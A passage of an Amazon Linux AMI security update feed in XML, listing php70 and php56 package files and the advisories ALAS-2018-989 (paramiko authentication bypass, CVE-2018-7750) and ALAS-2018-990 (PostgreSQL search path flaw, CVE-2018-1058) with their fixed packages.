arch="i686"><filename>Packages/php70-xmlrpc-7.0.29-1.28.amzn1.i686.rpm</filename></package><package name="php70-zip" version="7.0.29" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php70-zip-7.0.29-1.28.amzn1.i686.rpm</filename></package><package name="php70-intl" version="7.0.29" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php70-intl-7.0.29-1.28.amzn1.i686.rpm</filename></package><package name="php70-devel" version="7.0.29" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php70-devel-7.0.29-1.28.amzn1.i686.rpm</filename></package><package name="php70-gd" version="7.0.29" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php70-gd-7.0.29-1.28.amzn1.i686.rpm</filename></package><package name="php70-json" version="7.0.29" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php70-json-7.0.29-1.28.amzn1.i686.rpm</filename></package><package name="php70-pspell" version="7.0.29" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pspell-7.0.29-1.28.amzn1.i686.rpm</filename></package><package name="php70-soap" version="7.0.29" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php70-soap-7.0.29-1.28.amzn1.i686.rpm</filename></package><package name="php70-process" version="7.0.29" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php70-process-7.0.29-1.28.amzn1.i686.rpm</filename></package><package name="php70-fpm" version="7.0.29" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php70-fpm-7.0.29-1.28.amzn1.i686.rpm</filename></package><package name="php70-opcache" version="7.0.29" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php70-opcache-7.0.29-1.28.amzn1.i686.rpm</filename></package><package name="php70-pgsql" version="7.0.29" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pgsql-7.0.29-1.28.amzn1.i686.rpm</filename></package><package name="php70-mysqlnd" version="7.0.29" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php70-mysqlnd-7.0.29-1.28.amzn1.i686.rpm</filename></package><package name="php70-recode" version="7.0.29" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php70-recode-7.0.29-1.28.amzn1.i686.rpm</filename></package><package name="php70-debuginfo" version="7.0.29" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php70-debuginfo-7.0.29-1.28.amzn1.i686.rpm</filename></package><package name="php70-dba" version="7.0.29" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php70-dba-7.0.29-1.28.amzn1.i686.rpm</filename></package><package name="php70-common" version="7.0.29" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php70-common-7.0.29-1.28.amzn1.i686.rpm</filename></package><package name="php70-pdo" version="7.0.29" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pdo-7.0.29-1.28.amzn1.i686.rpm</filename></package><package name="php70-pdo-dblib" version="7.0.29" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pdo-dblib-7.0.29-1.28.amzn1.i686.rpm</filename></package><package name="php70-cli" version="7.0.29" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php70-cli-7.0.29-1.28.amzn1.i686.rpm</filename></package><package name="php70-xml" version="7.0.29" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php70-xml-7.0.29-1.28.amzn1.i686.rpm</filename></package><package name="php70-bcmath" version="7.0.29" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php70-bcmath-7.0.29-1.28.amzn1.i686.rpm</filename></package><package name="php70-mbstring" version="7.0.29" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php70-mbstring-7.0.29-1.28.amzn1.i686.rpm</filename></package><package name="php70-imap" version="7.0.29" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php70-imap-7.0.29-1.28.amzn1.i686.rpm</filename></package><package name="php70-odbc" version="7.0.29" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php70-odbc-7.0.29-1.28.amzn1.i686.rpm</filename></package><package name="php70-mcrypt" version="7.0.29" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php70-mcrypt-7.0.29-1.28.amzn1.i686.rpm</filename></package><package name="php56-gmp" version="5.6.35" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gmp-5.6.35-1.137.amzn1.x86_64.rpm</filename></package><package name="php56-xml" version="5.6.35" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xml-5.6.35-1.137.amzn1.x86_64.rpm</filename></package><package name="php56-imap" version="5.6.35" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-imap-5.6.35-1.137.amzn1.x86_64.rpm</filename></package><package name="php56-tidy" version="5.6.35" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-tidy-5.6.35-1.137.amzn1.x86_64.rpm</filename></package><package name="php56-odbc" version="5.6.35" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-odbc-5.6.35-1.137.amzn1.x86_64.rpm</filename></package><package name="php56-fpm" version="5.6.35" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-fpm-5.6.35-1.137.amzn1.x86_64.rpm</filename></package><package name="php56-devel" version="5.6.35" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-devel-5.6.35-1.137.amzn1.x86_64.rpm</filename></package><package name="php56-dbg" version="5.6.35" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dbg-5.6.35-1.137.amzn1.x86_64.rpm</filename></package><package name="php56-process" version="5.6.35" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-process-5.6.35-1.137.amzn1.x86_64.rpm</filename></package><package name="php56-mbstring" version="5.6.35" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mbstring-5.6.35-1.137.amzn1.x86_64.rpm</filename></package><package name="php56-pdo" version="5.6.35" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pdo-5.6.35-1.137.amzn1.x86_64.rpm</filename></package><package name="php56-xmlrpc" version="5.6.35" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xmlrpc-5.6.35-1.137.amzn1.x86_64.rpm</filename></package><package name="php56" version="5.6.35" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-5.6.35-1.137.amzn1.x86_64.rpm</filename></package><package name="php56-gd" version="5.6.35" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gd-5.6.35-1.137.amzn1.x86_64.rpm</filename></package><package name="php56-ldap" version="5.6.35" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-ldap-5.6.35-1.137.amzn1.x86_64.rpm</filename></package><package name="php56-dba" version="5.6.35" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dba-5.6.35-1.137.amzn1.x86_64.rpm</filename></package><package name="php56-mcrypt" version="5.6.35" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mcrypt-5.6.35-1.137.amzn1.x86_64.rpm</filename></package><package name="php56-intl" version="5.6.35" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-intl-5.6.35-1.137.amzn1.x86_64.rpm</filename></package><package name="php56-embedded" version="5.6.35" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-embedded-5.6.35-1.137.amzn1.x86_64.rpm</filename></package><package name="php56-bcmath" version="5.6.35" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-bcmath-5.6.35-1.137.amzn1.x86_64.rpm</filename></package><package name="php56-common" version="5.6.35" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-common-5.6.35-1.137.amzn1.x86_64.rpm</filename></package><package name="php56-recode" version="5.6.35" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-recode-5.6.35-1.137.amzn1.x86_64.rpm</filename></package><package name="php56-opcache" version="5.6.35" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-opcache-5.6.35-1.137.amzn1.x86_64.rpm</filename></package><package name="php56-enchant" version="5.6.35" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-enchant-5.6.35-1.137.amzn1.x86_64.rpm</filename></package><package name="php56-mssql" version="5.6.35" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mssql-5.6.35-1.137.amzn1.x86_64.rpm</filename></package><package name="php56-pgsql" version="5.6.35" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pgsql-5.6.35-1.137.amzn1.x86_64.rpm</filename></package><package name="php56-cli" version="5.6.35" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-cli-5.6.35-1.137.amzn1.x86_64.rpm</filename></package><package name="php56-soap" version="5.6.35" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-soap-5.6.35-1.137.amzn1.x86_64.rpm</filename></package><package name="php56-mysqlnd" version="5.6.35" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mysqlnd-5.6.35-1.137.amzn1.x86_64.rpm</filename></package><package name="php56-debuginfo" version="5.6.35" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-debuginfo-5.6.35-1.137.amzn1.x86_64.rpm</filename></package><package name="php56-snmp" version="5.6.35" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-snmp-5.6.35-1.137.amzn1.x86_64.rpm</filename></package><package name="php56-pspell" version="5.6.35" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pspell-5.6.35-1.137.amzn1.x86_64.rpm</filename></package><package name="php56-mysqlnd" version="5.6.35" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mysqlnd-5.6.35-1.137.amzn1.i686.rpm</filename></package><package name="php56-pdo" version="5.6.35" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pdo-5.6.35-1.137.amzn1.i686.rpm</filename></package><package name="php56-xml" version="5.6.35" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xml-5.6.35-1.137.amzn1.i686.rpm</filename></package><package name="php56-bcmath" version="5.6.35" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/php56-bcmath-5.6.35-1.137.amzn1.i686.rpm</filename></package><package name="php56-intl" version="5.6.35" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/php56-intl-5.6.35-1.137.amzn1.i686.rpm</filename></package><package name="php56-ldap" version="5.6.35" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/php56-ldap-5.6.35-1.137.amzn1.i686.rpm</filename></package><package name="php56-pspell" version="5.6.35" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pspell-5.6.35-1.137.amzn1.i686.rpm</filename></package><package name="php56-process" version="5.6.35" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/php56-process-5.6.35-1.137.amzn1.i686.rpm</filename></package><package name="php56-devel" version="5.6.35" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/php56-devel-5.6.35-1.137.amzn1.i686.rpm</filename></package><package name="php56-soap" version="5.6.35" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/php56-soap-5.6.35-1.137.amzn1.i686.rpm</filename></package><package name="php56-recode" version="5.6.35" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/php56-recode-5.6.35-1.137.amzn1.i686.rpm</filename></package><package name="php56-dba" version="5.6.35" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dba-5.6.35-1.137.amzn1.i686.rpm</filename></package><package name="php56-gd" version="5.6.35" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gd-5.6.35-1.137.amzn1.i686.rpm</filename></package><package name="php56-odbc" version="5.6.35" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/php56-odbc-5.6.35-1.137.amzn1.i686.rpm</filename></package><package name="php56-debuginfo" version="5.6.35" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/php56-debuginfo-5.6.35-1.137.amzn1.i686.rpm</filename></package><package name="php56-enchant" version="5.6.35" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/php56-enchant-5.6.35-1.137.amzn1.i686.rpm</filename></package><package name="php56-xmlrpc" version="5.6.35" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xmlrpc-5.6.35-1.137.amzn1.i686.rpm</filename></package><package name="php56-common" version="5.6.35" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/php56-common-5.6.35-1.137.amzn1.i686.rpm</filename></package><package name="php56-dbg" version="5.6.35" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dbg-5.6.35-1.137.amzn1.i686.rpm</filename></package><package name="php56-cli" version="5.6.35" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/php56-cli-5.6.35-1.137.amzn1.i686.rpm</filename></package><package name="php56-snmp" version="5.6.35" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/php56-snmp-5.6.35-1.137.amzn1.i686.rpm</filename></package><package name="php56-mcrypt" version="5.6.35" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mcrypt-5.6.35-1.137.amzn1.i686.rpm</filename></package><package name="php56-pgsql" version="5.6.35" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pgsql-5.6.35-1.137.amzn1.i686.rpm</filename></package><package name="php56-embedded" version="5.6.35" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/php56-embedded-5.6.35-1.137.amzn1.i686.rpm</filename></package><package name="php56-mbstring" version="5.6.35" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mbstring-5.6.35-1.137.amzn1.i686.rpm</filename></package><package name="php56-gmp" version="5.6.35" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gmp-5.6.35-1.137.amzn1.i686.rpm</filename></package><package name="php56-tidy" version="5.6.35" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/php56-tidy-5.6.35-1.137.amzn1.i686.rpm</filename></package><package name="php56-mssql" version="5.6.35" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mssql-5.6.35-1.137.amzn1.i686.rpm</filename></package><package name="php56-fpm" version="5.6.35" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/php56-fpm-5.6.35-1.137.amzn1.i686.rpm</filename></package><package name="php56-opcache" version="5.6.35" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/php56-opcache-5.6.35-1.137.amzn1.i686.rpm</filename></package><package name="php56-imap" version="5.6.35" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/php56-imap-5.6.35-1.137.amzn1.i686.rpm</filename></package><package name="php56" version="5.6.35" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/php56-5.6.35-1.137.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-989</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-989: critical priority package update for python-paramiko</title><issued date="2018-04-05 16:41:00" /><updated date="2018-04-05 23:15:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-7750:
transport.py in the SSH server implementation of Paramiko before 1.17.6, 1.18.x before 1.18.5, 2.0.x before 2.0.8, 2.1.x before 2.1.5, 2.2.x before 2.2.3, 2.3.x before 2.3.2, and 2.4.x before 2.4.1 does not properly check whether authentication is completed before processing other requests, as demonstrated by channel-open. A customized SSH client can simply skip the authentication step.
1557130:
CVE-2018-7750 python-paramiko: Authentication bypass in transport.py
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7750" title="" id="CVE-2018-7750" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python26-paramiko" version="1.15.1" release="2.6.amzn1" epoch="0" arch="noarch"><filename>Packages/python26-paramiko-1.15.1-2.6.amzn1.noarch.rpm</filename></package><package name="python27-paramiko" version="1.15.1" release="2.6.amzn1" epoch="0" arch="noarch"><filename>Packages/python27-paramiko-1.15.1-2.6.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-990</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-990: medium priority package update for postgresql93 postgresql94 postgresql95 postgresql96</title><issued date="2018-04-05 16:55:00" /><updated date="2018-04-05 23:16:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-1058:
A flaw was found in the way Postgresql allowed a user to modify the behavior of a query for other users. An attacker with a user account could use this flaw to execute code with the permissions of superuser in the database.
1547044:
CVE-2018-1058 postgresql: Uncontrolled search path element in pg_dump and other client applications
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1058" title="" id="CVE-2018-1058" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql96-libs" version="9.6.8" release="1.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-libs-9.6.8-1.80.amzn1.x86_64.rpm</filename></package><package name="postgresql96-plperl" version="9.6.8" release="1.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-plperl-9.6.8-1.80.amzn1.x86_64.rpm</filename></package><package name="postgresql96-plpython27" version="9.6.8" release="1.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-plpython27-9.6.8-1.80.amzn1.x86_64.rpm</filename></package><package name="postgresql96-server" version="9.6.8" release="1.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-server-9.6.8-1.80.amzn1.x86_64.rpm</filename></package><package name="postgresql96-debuginfo" version="9.6.8" release="1.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-debuginfo-9.6.8-1.80.amzn1.x86_64.rpm</filename></package><package name="postgresql96-docs" version="9.6.8" release="1.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-docs-9.6.8-1.80.amzn1.x86_64.rpm</filename></package><package name="postgresql96-contrib" version="9.6.8" release="1.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-contrib-9.6.8-1.80.amzn1.x86_64.rpm</filename></package><package name="postgresql96-plpython26" version="9.6.8" release="1.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-plpython26-9.6.8-1.80.amzn1.x86_64.rpm</filename></package><package name="postgresql96" version="9.6.8" release="1.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-9.6.8-1.80.amzn1.x86_64.rpm</filename></package><package name="postgresql96-devel" version="9.6.8" release="1.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-devel-9.6.8-1.80.amzn1.x86_64.rpm</filename></package><package name="postgresql96-test" version="9.6.8" release="1.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-test-9.6.8-1.80.amzn1.x86_64.rpm</filename></package><package name="postgresql96-static" version="9.6.8" release="1.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-static-9.6.8-1.80.amzn1.x86_64.rpm</filename></package><package name="postgresql96-test" version="9.6.8" release="1.80.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-test-9.6.8-1.80.amzn1.i686.rpm</filename></package><package name="postgresql96-plpython27" version="9.6.8" release="1.80.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-plpython27-9.6.8-1.80.amzn1.i686.rpm</filename></package><package name="postgresql96-contrib" version="9.6.8" release="1.80.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-contrib-9.6.8-1.80.amzn1.i686.rpm</filename></package><package name="postgresql96-plperl" version="9.6.8" release="1.80.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-plperl-9.6.8-1.80.amzn1.i686.rpm</filename></package><package name="postgresql96-server" version="9.6.8" release="1.80.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-server-9.6.8-1.80.amzn1.i686.rpm</filename></package><package name="postgresql96-static" version="9.6.8" release="1.80.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-static-9.6.8-1.80.amzn1.i686.rpm</filename></package><package name="postgresql96" version="9.6.8" release="1.80.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-9.6.8-1.80.amzn1.i686.rpm</filename></package><package name="postgresql96-debuginfo" version="9.6.8" release="1.80.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-debuginfo-9.6.8-1.80.amzn1.i686.rpm</filename></package><package name="postgresql96-devel" version="9.6.8" release="1.80.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-devel-9.6.8-1.80.amzn1.i686.rpm</filename></package><package name="postgresql96-docs" version="9.6.8" release="1.80.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-docs-9.6.8-1.80.amzn1.i686.rpm</filename></package><package name="postgresql96-libs" version="9.6.8" release="1.80.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-libs-9.6.8-1.80.amzn1.i686.rpm</filename></package><package name="postgresql96-plpython26" version="9.6.8" release="1.80.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-plpython26-9.6.8-1.80.amzn1.i686.rpm</filename></package><package name="postgresql95-plpython27" version="9.5.12" release="1.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-plpython27-9.5.12-1.78.amzn1.x86_64.rpm</filename></package><package name="postgresql95" version="9.5.12" release="1.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-9.5.12-1.78.amzn1.x86_64.rpm</filename></package><package name="postgresql95-plperl" version="9.5.12" release="1.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-plperl-9.5.12-1.78.amzn1.x86_64.rpm</filename></package><package name="postgresql95-devel" version="9.5.12" release="1.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-devel-9.5.12-1.78.amzn1.x86_64.rpm</filename></package><package name="postgresql95-test" version="9.5.12" release="1.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-test-9.5.12-1.78.amzn1.x86_64.rpm</filename></package><package name="postgresql95-contrib" version="9.5.12" release="1.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-contrib-9.5.12-1.78.amzn1.x86_64.rpm</filename></package><package name="postgresql95-docs" version="9.5.12" release="1.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-docs-9.5.12-1.78.amzn1.x86_64.rpm</filename></package><package name="postgresql95-server" version="9.5.12" release="1.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-server-9.5.12-1.78.amzn1.x86_64.rpm</filename></package><package name="postgresql95-debuginfo" version="9.5.12" release="1.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-debuginfo-9.5.12-1.78.amzn1.x86_64.rpm</filename></package><package name="postgresql95-static" version="9.5.12" release="1.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-static-9.5.12-1.78.amzn1.x86_64.rpm</filename></package><package name="postgresql95-plpython26" version="9.5.12" release="1.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-plpython26-9.5.12-1.78.amzn1.x86_64.rpm</filename></package><package name="postgresql95-libs" version="9.5.12" release="1.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-libs-9.5.12-1.78.amzn1.x86_64.rpm</filename></package><package name="postgresql95-plpython27" version="9.5.12" release="1.78.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-plpython27-9.5.12-1.78.amzn1.i686.rpm</filename></package><package name="postgresql95-plperl" version="9.5.12" release="1.78.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-plperl-9.5.12-1.78.amzn1.i686.rpm</filename></package><package name="postgresql95-devel" version="9.5.12" release="1.78.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-devel-9.5.12-1.78.amzn1.i686.rpm</filename></package><package name="postgresql95-test" version="9.5.12" release="1.78.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-test-9.5.12-1.78.amzn1.i686.rpm</filename></package><package name="postgresql95-libs" version="9.5.12" release="1.78.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-libs-9.5.12-1.78.amzn1.i686.rpm</filename></package><package name="postgresql95-static" version="9.5.12" release="1.78.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-static-9.5.12-1.78.amzn1.i686.rpm</filename></package><package name="postgresql95-server" version="9.5.12" release="1.78.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-server-9.5.12-1.78.amzn1.i686.rpm</filename></package><package name="postgresql95-docs" version="9.5.12" release="1.78.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-docs-9.5.12-1.78.amzn1.i686.rpm</filename></package><package name="postgresql95-debuginfo" version="9.5.12" release="1.78.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-debuginfo-9.5.12-1.78.amzn1.i686.rpm</filename></package><package name="postgresql95-contrib" version="9.5.12" release="1.78.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-contrib-9.5.12-1.78.amzn1.i686.rpm</filename></package><package name="postgresql95" version="9.5.12" release="1.78.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-9.5.12-1.78.amzn1.i686.rpm</filename></package><package name="postgresql95-plpython26" version="9.5.12" release="1.78.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-plpython26-9.5.12-1.78.amzn1.i686.rpm</filename></package><package name="postgresql93-docs" version="9.3.22" release="1.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-docs-9.3.22-1.70.amzn1.x86_64.rpm</filename></package><package name="postgresql93-plpython26" version="9.3.22" release="1.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-plpython26-9.3.22-1.70.amzn1.x86_64.rpm</filename></package><package name="postgresql93-server" version="9.3.22" release="1.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-server-9.3.22-1.70.amzn1.x86_64.rpm</filename></package><package name="postgresql93-plpython27" version="9.3.22" release="1.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-plpython27-9.3.22-1.70.amzn1.x86_64.rpm</filename></package><package name="postgresql93-pltcl" version="9.3.22" release="1.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-pltcl-9.3.22-1.70.amzn1.x86_64.rpm</filename></package><package name="postgresql93-devel" version="9.3.22" release="1.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-devel-9.3.22-1.70.amzn1.x86_64.rpm</filename></package><package name="postgresql93-debuginfo" version="9.3.22" release="1.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-debuginfo-9.3.22-1.70.amzn1.x86_64.rpm</filename></package><package name="postgresql93-contrib" version="9.3.22" release="1.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-contrib-9.3.22-1.70.amzn1.x86_64.rpm</filename></package><package name="postgresql93-libs" version="9.3.22" release="1.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-libs-9.3.22-1.70.amzn1.x86_64.rpm</filename></package><package name="postgresql93-plperl" version="9.3.22" release="1.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-plperl-9.3.22-1.70.amzn1.x86_64.rpm</filename></package><package name="postgresql93-test" version="9.3.22" release="1.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-test-9.3.22-1.70.amzn1.x86_64.rpm</filename></package><package name="postgresql93" version="9.3.22" release="1.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-9.3.22-1.70.amzn1.x86_64.rpm</filename></package><package name="postgresql93-plpython27" version="9.3.22" release="1.70.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-plpython27-9.3.22-1.70.amzn1.i686.rpm</filename></package><package name="postgresql93-pltcl" version="9.3.22" release="1.70.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-pltcl-9.3.22-1.70.amzn1.i686.rpm</filename></package><package name="postgresql93-debuginfo" version="9.3.22" release="1.70.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-debuginfo-9.3.22-1.70.amzn1.i686.rpm</filename></package><package name="postgresql93-devel" version="9.3.22" release="1.70.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-devel-9.3.22-1.70.amzn1.i686.rpm</filename></package><package name="postgresql93" version="9.3.22" release="1.70.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-9.3.22-1.70.amzn1.i686.rpm</filename></package><package name="postgresql93-libs" version="9.3.22" release="1.70.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-libs-9.3.22-1.70.amzn1.i686.rpm</filename></package><package name="postgresql93-server" version="9.3.22" release="1.70.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-server-9.3.22-1.70.amzn1.i686.rpm</filename></package><package name="postgresql93-docs" version="9.3.22" release="1.70.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-docs-9.3.22-1.70.amzn1.i686.rpm</filename></package><package name="postgresql93-plpython26" version="9.3.22" release="1.70.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-plpython26-9.3.22-1.70.amzn1.i686.rpm</filename></package><package name="postgresql93-test" version="9.3.22" release="1.70.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-test-9.3.22-1.70.amzn1.i686.rpm</filename></package><package name="postgresql93-plperl" version="9.3.22" release="1.70.amzn1" epoch="0" 